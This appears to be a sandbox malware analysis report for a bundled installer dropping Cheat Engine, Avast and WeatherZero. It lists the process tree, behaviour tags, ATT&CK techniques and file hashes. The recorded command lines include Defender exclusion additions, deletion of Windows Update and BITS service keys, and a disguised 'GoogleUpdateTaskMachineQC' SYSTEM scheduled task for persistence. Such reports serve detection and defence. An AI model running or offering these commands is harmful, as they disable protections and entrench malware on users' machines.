C:\Users\Admin\AppData\Local\Temp\is-84G9R.tmp\prod2_extract\cookie_mmm_irs_ppi_005_888_a.exe"C:\Users\Admin\AppData\Local\Temp\is-84G9R.tmp\prod2_extract\cookie_mmm_irs_ppi_005_888_a.exe" /silent /ws /psh:2bJ1kmAHfOVPdDbZvELadXU3y05VWucsYJrtxXbFe3KSKCo9conhW21JtvxYrBpsh3rEC7MaFMizD5⤵
- Executes dropped EXE
- Loads dropped DLL
- Writes to the Master Boot Record (MBR)
- System Location Discovery: System Language Discovery
PID:2276 -
C:\Windows\Temp\asw.ab65a09faa6d20cc\avast_free_antivirus_setup_online_x64.exe"C:\Windows\Temp\asw.ab65a09faa6d20cc\avast_free_antivirus_setup_online_x64.exe" /silent /ws /psh:2bJ1kmAHfOVPdDbZvELadXU3y05VWucsYJrtxXbFe3KSKCo9conhW21JtvxYrBpsh3rEC7MaFMizD /cookie:mmm_irs_ppi_005_888_a /ga_clientid:35d772c0-ae51-44c4-af8a-3ee72fdcbfed /edat_dir:C:\Windows\Temp\asw.ab65a09faa6d20cc6⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks for any installed AV software in registry
- Writes to the Master Boot Record (MBR)
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:956 -
C:\Windows\Temp\asw.c5208545c09f9ab5\instup.exe"C:\Windows\Temp\asw.c5208545c09f9ab5\instup.exe" /sfx:lite /sfxstorage:C:\Windows\Temp\asw.c5208545c09f9ab5 /edition:1 /prod:ais /stub_context:6faaea0a-2bd9-4f98-a39f-c837271f115b:11119840 /guid:bcaa4a55-e761-434b-821e-1a21c941a17d /ga_clientid:35d772c0-ae51-44c4-af8a-3ee72fdcbfed /no_delayed_installation /silent /ws /psh:2bJ1kmAHfOVPdDbZvELadXU3y05VWucsYJrtxXbFe3KSKCo9conhW21JtvxYrBpsh3rEC7MaFMizD /cookie:mmm_irs_ppi_005_888_a /ga_clientid:35d772c0-ae51-44c4-af8a-3ee72fdcbfed /edat_dir:C:\Windows\Temp\asw.ab65a09faa6d20cc7⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks for any installed AV software in registry
- Writes to the Master Boot Record (MBR)
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:3016 -
C:\Windows\Temp\asw.c5208545c09f9ab5\New_15020997\instup.exe"C:\Windows\Temp\asw.c5208545c09f9ab5\New_15020997\instup.exe" /sfx /sfxstorage:C:\Windows\Temp\asw.c5208545c09f9ab5 /edition:1 /prod:ais /stub_context:6faaea0a-2bd9-4f98-a39f-c837271f115b:11119840 /guid:bcaa4a55-e761-434b-821e-1a21c941a17d /ga_clientid:35d772c0-ae51-44c4-af8a-3ee72fdcbfed /no_delayed_installation /silent /ws /psh:2bJ1kmAHfOVPdDbZvELadXU3y05VWucsYJrtxXbFe3KSKCo9conhW21JtvxYrBpsh3rEC7MaFMizD /cookie:mmm_irs_ppi_005_888_a /edat_dir:C:\Windows\Temp\asw.ab65a09faa6d20cc /online_installer8⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks for any installed AV software in registry
- Writes to the Master Boot Record (MBR)
- Drops file in Program Files directory
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:2660 -
C:\Windows\Temp\asw.c5208545c09f9ab5\New_15020997\sbr.exe"C:\Windows\Temp\asw.c5208545c09f9ab5\New_15020997\sbr.exe" 2660 "Avast Antivirus setup" "Avast Antivirus is being installed. Do not shut down your computer!"9⤵
- Executes dropped EXE
PID:1920
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-84G9R.tmp\CheatEngine75.exe"C:\Users\Admin\AppData\Local\Temp\is-84G9R.tmp\CheatEngine75.exe" /VERYSILENT /ZBDIST5⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1368 -
C:\Users\Admin\AppData\Local\Temp\is-NNQT8.tmp\CheatEngine75.tmp"C:\Users\Admin\AppData\Local\Temp\is-NNQT8.tmp\CheatEngine75.tmp" /SL5="$30162,26511452,832512,C:\Users\Admin\AppData\Local\Temp\is-84G9R.tmp\CheatEngine75.exe" /VERYSILENT /ZBDIST6⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of FindShellTrayWindow
PID:2912 -
C:\Windows\system32\net.exe"net" stop BadlionAntic7⤵PID:2784
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BadlionAntic8⤵PID:2932
-
-
-
C:\Windows\system32\net.exe"net" stop BadlionAnticheat7⤵PID:688
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BadlionAnticheat8⤵PID:1028
-
-
-
C:\Windows\system32\sc.exe"sc" delete BadlionAntic7⤵
- Launches sc.exe
PID:2284
-
-
C:\Windows\system32\sc.exe"sc" delete BadlionAnticheat7⤵
- Launches sc.exe
PID:2876
-
-
C:\Users\Admin\AppData\Local\Temp\is-7V235.tmp\_isetup\_setup64.tmphelper 105 0x1F87⤵
- Executes dropped EXE
PID:2420
-
-
C:\Windows\system32\icacls.exe"icacls" "C:\Program Files\Cheat Engine 7.5" /grant *S-1-15-2-1:(OI)(CI)(RX)7⤵
- Modifies file permissions
PID:1504
-
-
C:\Program Files\Cheat Engine 7.5\Kernelmoduleunloader.exe"C:\Program Files\Cheat Engine 7.5\Kernelmoduleunloader.exe" /SETUP7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:788
-
-
C:\Program Files\Cheat Engine 7.5\windowsrepair.exe"C:\Program Files\Cheat Engine 7.5\windowsrepair.exe" /s7⤵
- Executes dropped EXE
PID:1152
-
-
C:\Windows\system32\icacls.exe"icacls" "C:\Program Files\Cheat Engine 7.5" /grant *S-1-15-2-1:(OI)(CI)(RX)7⤵
- Modifies file permissions
PID:1240
-
-
-
-
C:\Program Files\Cheat Engine 7.5\Cheat Engine.exe"C:\Program Files\Cheat Engine 7.5\Cheat Engine.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1844 -
C:\Program Files\Cheat Engine 7.5\cheatengine-x86_64-SSE4-AVX2.exe"C:\Program Files\Cheat Engine 7.5\cheatengine-x86_64-SSE4-AVX2.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:780
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2804 -s 4765⤵
- Loads dropped DLL
- Program crash
PID:2168
-
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1520
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1244 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:2660
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:2740
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:1872
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:2668
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:2848
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵PID:2608
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵PID:2180
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
PID:2004
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵PID:2768
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵PID:1252
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Power Settings
- Suspicious use of WriteProcessMemory
PID:2712 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2744
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2428
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2648
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2692
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zfjwxc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2276 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"3⤵
- Scheduled Task/Job: Scheduled Task
PID:2196
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#tugby#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2880 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC3⤵PID:1528
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2928
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵PID:1372
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:2852
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:2704
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:2536
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:2284
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:2664
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵PID:3016
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵PID:3020
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵PID:3008
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵PID:2420
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵PID:448
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Power Settings
PID:2096 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2932
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2152
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1028
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1416
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zfjwxc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2100 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"3⤵
- Scheduled Task/Job: Scheduled Task
PID:1504
-
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe ubulqosn2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
PID:2120
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵PID:2500
-
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor3⤵
- Detects videocard installed
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1564
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
PID:1044
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe vgyegivgfazcjxdl 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPrOXm4kGtEn/ZgPyjiDYwe/zRLKpUXs5FnM1Cz+lDKtsCEDVmxImOWutHy/wWAAF6uYRISXHrJSUiB0oBkYNVSVc+Z5TfdaGGtLWt9rhn1IwMTF8FurdYcS6sHeOOKov7n8fO9XzXfUsz+ohQT/DgIOyRpUwzATAbwxDv0BlAH+ISI2MOv7cXgWh/hEHn9UpTLH2AUxVXP8zWMLLWvPHAJe2SIfhjGncq3xQ+gVn+I4NKh77PPjDPgwHNzByaS5XiUtDR8Md5EhmkOEwD9v8Eh4nbJIewLTK837YGsKnb02yQo3e+jdFtCWzMfMeobPaXFvrKzv2emNNnxavmVO2FkfkcC1DvbnhN7NqgiVLh1FnuRerr7Rs9GSm8wk3eogEBuxtyJF/l7QvFFEn+PmzyQ6wNeX5T4KpCB8N2LdQ7qGf0xREtOLrL2we+R3IiFUCw/PgUnlB9aOUvPUntLmUYwnVg3n39kwuMDyHF7sntpqwSQW5ruNhQsPrhI9EqpLJ48=2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1580
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {209B7A4C-12D2-46B9-98BF-F6CD51537E6F} S-1-5-18:NT AUTHORITY\System:Service:1⤵
- Loads dropped DLL
PID:2036 -
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:2788
-
-
C:\Program Files (x86)\WeatherZero\WeatherZeroService.exe"C:\Program Files (x86)\WeatherZero\WeatherZeroService.exe"1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2656 -
C:\Program Files (x86)\WeatherZero\WeatherZero.exe"C:\Program Files (x86)\WeatherZero\WeatherZero.exe" /q=535784FCDD3D85FB6E4ABB0B27B039642⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2792 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xpo5vsnr.cmdline"3⤵
- System Location Discovery: System Language Discovery
PID:484 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8E6B.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC8E6A.tmp"4⤵
- System Location Discovery: System Language Discovery
PID:2624
-
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1System Services
1Service Execution
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Power Settings
1Pre-OS Boot
1Bootkit
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Scheduled Task
1Defense Evasion
File and Directory Permissions Modification
1Impair Defenses
1Modify Registry
3Pre-OS Boot
1Bootkit
1Subvert Trust Controls
1Install Root Certificate
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
2Credentials In Files
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5517c2b80936a26c96b2ff877ec3cc6b1
SHA1739951862a75fd3f84d412a29e03ac1062d3a98a
SHA25678f57f41a6247ca676ee42e34379c06acb04f8786ffdc3a19b075fe534eb5fef
SHA512b70640fff40bf230ae53af0e13a2b02eed456a42645dccf3085dc59566331a9d62722eaceea44d80bcd8d75e206bb23f07e7dd8786a6b9a317854caeba2e8941
-
Filesize
2KB
MD50cb8e609308dfc1bfc51114ac3a44df7
SHA1c3b57645b4a0ce4dad8ea8445ea981b82dca6f86
SHA2565cff710887a2483111cc2e23a377e3883ff2ecd10bb75aba95ad84eee077071d
SHA51241eeeaa66e2a1a604eec4f0036404dcd3577c2287957a5f214b939fb2e00ed780f39d820a6512d6c406654a4fa48b9c78830fca34f985abac67a29ebd29769e4
-
Filesize
263B
MD56a1910c51f39d1d89946615ad7c532f7
SHA1584530581f5f30d09859d3031595441cf9ddfb04
SHA2568d5a3de2b259d2c0fb35ad6d424ffa1dc00f890ace85b7c37932aeadb6482359
SHA51204fb819b28281d28ad0fc97ed3790223232c79de19ae9826254db144ba6f944c811a37c5f9e5ecc0c6e4dd6c283053c59360aa4d9a1023d17ceac94a2a3f5112
-
Filesize
2.0MB
MD5063818ec0b272a4f882addee83e4d92d
SHA1158b094c1a0ffca7debbfde9968f62c95020ba4e
SHA256cb269d06a49d3174908f606db1ad278fc5b11bdbf3306b7709f838aae385154d
SHA51293517c4da76e5b19d96adbbbe73ba47e784f1890a7389f1aaff8eef0fc9b67341a0615aa3dde17af2a101382e339495afc0ccfe595b308b5ae15a3f4a50e0379
-
Filesize
16KB
MD5dc3b327e99e65a08c75586646e9e412d
SHA18341b70a269e0996ad8ca4becb862566a9d662bb
SHA2561c1fc61f4446dcb61abbb4b3a04ec23a9c0fc5232d696fca2f9a85ade75f21f3
SHA512453d3acc25003907d63c8a60f6209afa8aaf1a5cf3e702ca3b0e4bf60a8d9942c42e50c10467fdb115c1ec378f85aa46d3f7d5a32a4e3b26339e8b63822e3266
-
Filesize
327KB
MD524040e34a97955e3a769f215f7d9c7c8
SHA1983e1eab4613d361c0d1a1b56ccbde1469e34f92
SHA256d20f9c083409f43de9a94aa152428fc114e429ded2955f60dc1b83b160c4eb89
SHA512056ea1d35da635e7348f4357cf3bbfae66bbba1b39a3d751508564c9167efba744460758e862810d3c42a77d660c1c7ae210ec9cf05090ece2642e28fa593319
-
Filesize
211KB
MD5312fca35f3497cf59ff72247c9c47de8
SHA1eafc6173812983eb1b03a4c4dc5ce16056c1b7e3
SHA2561ef3d96b810424351806ac0f62e70172d0855b7ce886fc64dfc97e82622103f6
SHA5126c2fa6c183d5e9f33072d2834eaab594b2600eea96eabc12169e281c13d5de92682300c38ced191108c83dc38b824fdddeabb2dc28badc7c9f70e3cc3c5e4e8e
-
Filesize
5.6MB
MD5898a2a0b6defff7cbcdbb50bed863145
SHA1c259ef62736cd7d9c4d9a6e5aaef778f7bdbef1c
SHA2563390ed2faa4b32aa60059d97e580ab7e0b4a8eb1d627f603cdb54996c08e205d
SHA51295f931d1d5f42f2789efcedd07ea3d6dc1e5038a4be0caf556a926187ead93780137317fc81b73eacd5808c53c9226066b4968fcf92a589fac354c406bc9eb0d
-
Filesize
11.3MB
MD56046aa984d4ee672fa4b1ac2ee825706
SHA1fb0f45e3fe20df6c3368b803b2c16aa7e67ff19e
SHA2569083c114ef611393bd7bc8c261c9efdb141c63ff56b0f40928be54bc2cbb8404
SHA51297d9e35c2843a32293a5d09694b6af9a474b974e0be7e831315a6ee7a285e759f249562838b28521bcd838717da7d631576b9a3b782dafbe78379ba751edc3ba
-
Filesize
389KB
MD5f921416197c2ae407d53ba5712c3930a
SHA16a7daa7372e93c48758b9752c8a5a673b525632b
SHA256e31b233ddf070798cc0381cc6285f6f79ea0c17b99737f7547618dcfd36cdc0e
SHA5120139efb76c2107d0497be9910836d7c19329e4399aa8d46bbe17ae63d56ab73004c51b650ce38d79681c22c2d1b77078a7d7185431882baf3e7bef473ac95dce
-
Filesize
236KB
MD59af96706762298cf72df2a74213494c9
SHA14b5fd2f168380919524ecce77aa1be330fdef57a
SHA25665fa2ccb3ac5400dd92dda5f640445a6e195da7c827107260f67624d3eb95e7d
SHA51229a0619093c4c0ecf602c861ec819ef16550c0607df93067eaef4259a84fd7d40eb88cd5548c0b3b265f3ce5237b585f508fdd543fa281737be17c0551163bd4
-
Filesize
5KB
MD55cff22e5655d267b559261c37a423871
SHA1b60ae22dfd7843dd1522663a3f46b3e505744b0f
SHA256a8d8227b8e97a713e0f1f5db5286b3db786b7148c1c8eb3d4bbfe683dc940db9
SHA512e00f5b4a7fa1989382df800d168871530917fcd99efcfe4418ef1b7e8473caea015f0b252cac6a982be93b5d873f4e9acdb460c8e03ae1c6eea9c37f84105e50
-
Filesize
198B
MD537dd19b2be4fa7635ad6a2f3238c4af1
SHA1e5b2c034636b434faee84e82e3bce3a3d3561943
SHA2568066872eea036f3ff59d58ff82ea1d5a8248ebc3c2b6161a17fe5c48441edc07
SHA51286e8550412f282e18ef0c6417ee94e9c141433913452efffb738d92f040e20ecc5e2250e9e2ac1f94c248eab83a601cba5b006e982a4aefe9dcb88e9c53c67e5
-
Filesize
1KB
MD5a266bb7dcc38a562631361bbf61dd11b
SHA13b1efd3a66ea28b16697394703a72ca340a05bd5
SHA256df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e
SHA5120da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD58bcc3769b0619970454b7dd21fdbfa35
SHA1f90748ffed6d82e666ef226582f5e2f9579a97e9
SHA256e7250ede8781801feac16d4786374e1829161bc09d80b47f8fb5b994d4a271b9
SHA5120d23648af008d4d9f83329257c68670ee8c847f36faf77ae0ea4d86474904a211e4564985d2ab9b24ad0c9b580b9ef22057df63f80967ace90b31ca10a53869e
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD54c81e97da7966262b849f5bf889f2341
SHA1ed9e39f6cac1f63de86c7f40878d8f12d5db32be
SHA256c6cb2e5b4158715fba32e7a4067519fab4603520582abad6486b80b860b70722
SHA512de5037335b4f0cd1b653e4970d789b5fac1fa4103bcfada9b309245d8e44d79ee10619c9cd4b806339568877a0f64d4b8d146e9bba4f4e47a09e6343c107ac94
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5ea4ed7a8cda20366dc2949279065aa71
SHA1dbb6dc71b9ab71e9b49089b51e91961aa4469d50
SHA25629c3c5b025bb9154feed32c019f79355fc02f3c6816eca9badff5603d439d305
SHA512a43486e7392e0d5c51d0fee2076b1d73e016c184efbb0cd442103e47292f32cfe58ebec81cf290206003d400c88c51e019e337d930b10769afa7b1d74ea7cc52
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
Filesize242B
MD57612c652126f872136eb8213c052fb0d
SHA131b5934be9343f866ba9e1cd35ee5d87fb707ae6
SHA256b56ab87c322788145695faa800848b728c54a44704a6176019fe60c994a71e31
SHA51267e2818c4741eb12d10fe5212de1c9de287282a6aab9b786119398520fd6befe204e4cf54c315a773fc3326d3a63a036de6afb4fbc01cb0a2283244db925deaf
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
571KB
MD5169b6d383b7c650ab3ae2129397a6cf3
SHA1fcaef7defb04301fd55fb1421bb15ef96d7040d6
SHA256b896083feb2bdedc1568b62805dbd354c55e57f2d2469a52aec6c98f4ec2dedf
